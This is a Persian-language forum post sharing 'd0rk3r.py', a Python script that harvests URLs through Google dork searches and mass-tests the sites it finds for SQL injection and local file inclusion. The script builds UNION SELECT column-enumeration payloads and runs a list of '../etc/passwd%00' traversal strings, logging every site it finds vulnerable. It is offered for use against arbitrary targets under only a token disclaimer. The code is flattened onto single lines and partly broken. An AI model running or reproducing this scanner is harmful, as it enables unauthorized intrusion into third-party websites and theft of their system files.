ts icon
سرور تیم اسپیک گاردایران

پست های پیشنهاد شده

این یک ابزار قوی هستش که به جستجوی باگ های lfi و sql در سایت مورد نظر شما میبردازد

این ابزار به زبان python نوشته شده است

#!/usr/bin/python# This was written for educational purpose and pentest only. Use it at your own risk.# Author will be not responsible for any damage!# !!! Special greetz for my friend sinner_01 !!!# Toolname		: d0rk3r.py# Coder		   : baltazar a.k.a b4ltazar < b4ltazar@gmail.com># Version		 : 0.1# About		   : No proxy support in this version, will put it in next one ...# Greetz for rsauron and low1z, great python coders# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org### Example of use  : ./d0rk3r.py -i id= -s com -c redfront -f php -m 500# U have two options, SQLi or LFI scanning .# When found site vuln to sqli, then it try to find number of columns# After scanning check d0rk3r.txt for more infoimport string, sys, time, urllib2, cookielib, re, random, threading, socket, os, timefrom random import choicefrom optparse import OptionParserif sys.platform == 'linux' or sys.platform == 'linux2':	clearing = 'clear'else:	clearing = 'cls'os.system(clearing)colMax = 20log = "d0rk3r.txt"logfile = open(log, "a")threads = []numthreads = 1lfinumthreads =8timeout = 4socket.setdefaulttimeout(timeout)W  = "\033[0m";R  = "\033[31m";G  = "\033[32m";O  = "\033[33m";B  = "\033[34m";rSA = [2,3,4,5,6]CXdic = {'blackle': '013269018370076798483:gg7jrrhpsy4',		 'ssearch': '008548304570556886379:0vtwavbfaqe',		 'redfront': '017478300291956931546:v0vo-1jh2y4',		 'bitcomet': '003763893858882295225:hz92q2xruzy',		 'dapirats': '002877699081652281083:klnfl5og4kg',		 'darkc0de': '009758108896363993364:wnzqtk1afdo',		 'googuuul': '014345598409501589908:mplknj4r1bu'}SQLeD = {'MySQL': 'error in your SQL syntax',		 'Oracle': 'ORA-01756',		 'MiscError': 'SQL Error',	 'MiscError2': 'mysql_fetch_row',	 'MiscError3': 'num_rows',		 'JDBC_CFM': 'Error Executing Database Query',		 'JDBC_CFM2': 'SQLServer JDBC Driver',		 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',		 'MSSQL_Uqm': 'Unclosed quotation mark',		 'MS-Access_ODBC': 'ODBC Microsoft Access Driver',		 'MS-Access_JETdb': 'Microsoft JET Database'}lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]filetypes = ['php','php5','asp','aspx','jsp','htm','html','cfm']header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',		  'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',		  'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',	  'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',	  'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',	  'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',	  'Microsoft Internet Explorer/4.0b1 (Windows 95)',	  'Opera/8.00 (Windows NT 5.1; U; en)',	  'amaya/9.51 libwww/5.4.0',	  'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',	  'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',	  'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',	  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',	  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',	  'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']gnum = 100def logo():	print G+"\n|---------------------------------------------------------------|"		print "| b4ltazar[@]gmail[dot]com									  |"		print "|   02/2011	 d0rk3r.py  v.0.1								|"		print "|															   |"		print "|---------------------------------------------------------------|\n"	print "\n[-] %s\n" % time.strftime("%X")def cxeSearch(go_inurl,go_site,go_cxe,go_ftype,maxc):	uRLS = []	counter = 0	   	while counter < int(maxc):			  	jar = cookielib.FileCookieJar("cookies")				query = 'q='+go_inurl+'+'+go_site+'+'+go_ftype				results_web = 'http://www.google.com/cse?'+go_cxe+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'				request_web = urllib2.Request(results_web)		agent = random.choice(header)				request_web.add_header('User-Agent', agent)		opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))				text = opener_web.open(request_web).read()		strreg = re.compile('(?<=href=")(.*?)(?=")')				names = strreg.findall(text)		counter += 100				for name in names:					  	if name not in uRLS:							   	if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):									   	pass				elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):									   	pass				else:									  	uRLS.append(name)	tmpList = []; finalList = []	print "[+] URLS (unsorted) :", len(uRLS)		for entry in uRLS:		try:			t2host = entry.split("/",3)			domain = t2host[2]			if domain not in tmpList and "=" in entry:				finalList.append(entry)				tmpList.append(domain)		except:			pass	print "[+] URLS (sorted)   :", len(finalList)	return finalListclass injThread(threading.Thread):		def __init__(self,hosts):				self.hosts=hosts;self.fcount = 0				self.check = True				threading.Thread.__init__(self)		def run (self):				urls = list(self.hosts)				for url in urls:						try:								if self.check == True:										ClassicINJ(url)								else:										break						except(KeyboardInterrupt,ValueError):								pass				self.fcount+=1		def stop(self):				self.check = Falseclass lfiThread(threading.Thread):		def __init__(self,hosts):				self.hosts=hosts;self.fcount = 0				self.check = True				threading.Thread.__init__(self)		def run (self):				urls = list(self.hosts)				for url in urls:						try:								if self.check == True:										ClassicLFI(url)								else:										break						except(KeyboardInterrupt,ValueError):								pass				self.fcount+=1		def stop(self):				self.check = Falsedef ClassicINJ(url):		EXT = "'"		host = url+EXT		try:				source = urllib2.urlopen(host).read()				for type,eMSG in SQLeD.items():						if re.search(eMSG, source):								print R+"\nw00t!,w00t!:", O+host, B+"Error:", type				#logfile.write("\n"+host)				findcol(url)						else:								pass		except:				passdef findcol(url):	print "\n[+] Attempting to find the number of columns ..."	checkfor = []	firstgo = "True"	site = url+"+and+1=2+union+all+select+"	makepretty = ""	for a in xrange(0,colMax):		darkc0de = "dark"+str(a)+"c0de"		checkfor.append(darkc0de)		if firstgo == "True":			site = site+"0x"+darkc0de.encode("hex")			firstgo = "False"		else:			site = site+",0x"+darkc0de.encode("hex")		finalurl = site+"--"		source = urllib2.urlopen(finalurl).read()		for b in checkfor:			colFound = re.findall(b,source)			if len(colFound) >= 1:				print "\n[+] Column Length is:",len(checkfor)				b = re.findall(("\d+"),				print "[+] Found null column at column #:",b[0]				firstgo = "True:"				for c in xrange(0,len(checkfor)):					if firstgo == "True":						makepretty = makepretty+str(c)						firstgo = "False"					else:						makepretty = makepretty+","+str(c)				print "[+] Site URL:",url+"+and+1=2+union+all+select+"+makepretty+"--"				url = url+"+and+1=2+union+all+select+"+makepretty+"--"				url = url.replace(","+b[0]+",",",darkc0de,")				url = url.replace("+"+b[0]+",","+"+"darkc0de,")				url = url.replace(","+b[0],",darkc0de")				print "[+] darkc0de URL:",url				logfile.write("\n"+url)def ClassicLFI(url):	lfiurl = url.rsplit('=' ,1)[0]	if lfiurl[-1] != "=":		lfiurl = lfiurl + "="	for lfi in lfis:		print G+"[+] Checking:",lfiurl+lfi.replace("\n", "")		#print		try:			check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()			if re.findall("root:x", check):				print R+"w00t!,w00t!: ", O+lfiurl+lfi				logfile.write("\n"+lfiurl+lfi)		except:				passparser = OptionParser()parser.add_option("-i" ,type='string', dest='inurl',action='store', default="0wn3d_by_baltazar", help="inurl: operator")parser.add_option("-s", type='string', dest='site',action='store', default="com", help="site: operator")parser.add_option("-c", type='string', dest='cxe',action='store', default='redfront', help="custom search engine (blackle,ssearch,redfront,bitcomet,dapirats,darkc0de,googuuul)")parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="server side language filetype")parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="max results (default 500)")(options, args) = parser.parse_args()logo()if options.inurl != None:	print B+"[+] inurl  :",options.inurl	go_inurl = 'inurl:'+options.inurlif options.inurl != None:	if options.filetype in filetypes:		print "[+] filetype  :",options.filetype		go_ftype = 'inurl:'+options.filetype	else:		print "[+] inurl-filetype  : php"		go_ftype = 'inurl:php'if options.site != None:	print "[+] site   :",options.site	go_site = 'site:'+options.siteif options.cxe != None:	if options.cxe in CXdic.keys():		print "[+] CXE	:",CXdic[options.cxe]		ccxe = CXdic[options.cxe]	else:		print "[-] CXE	: no Proper CXE defined, using redfront"		ccxe = CXdic['redfront']	go_cxe = 'cx='+ccxeprint "[+] MaxRes :",options.maxcountcuRLS = cxeSearch(go_inurl,go_site,go_cxe,go_ftype,options.maxcount)mnu = Truewhile mnu == True:	print G+"\n[1] Injection Testing"	print "[2] LFI Testing"	print "[0] Exit\n"	chce = raw_input(":")	if chce == '1':		print "\n[+] Preparing for SQLi scanning ... "		print "[+] Can take a while ..."		print "[!] Working ...\n"		i = len(cuRLS) / int(numthreads)		m = len(cuRLS) % int(numthreads)		z = 0		if len(threads) <= numthreads:			for x in range(0, int(numthreads)):					sliced = cuRLS[x*i:(x+1)*i]						if (z < m):							sliced.append(cuRLS[int(numthreads)*i+z])								z += 1				thread = injThread(sliced)						thread.start()						threads.append(thread)		for thread in threads:			thread.join()	if chce == '2':		print "\n[+] Preparing for LFI scanning ... "		print "[+] Can take a while ..."		print "[!] Working ...\n"		i = len(cuRLS) / int(lfinumthreads)		m = len(cuRLS) % int(lfinumthreads)		z = 0		if len(threads) <= lfinumthreads:			for x in range(0, int(lfinumthreads)):					sliced = cuRLS[x*i:(x+1)*i]						if (z < m):							sliced.append(cuRLS[int(lfinumthreads)*i+z])								z += 1				thread = lfiThread(sliced)						thread.start()						threads.append(thread)		for thread in threads:			thread.join()	if chce == '0':		print R+"\n[-] Exiting ..."		mnu = False 
usage :
./d0rk3r.py -i id= -s com -c redfront -f php -m 500

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری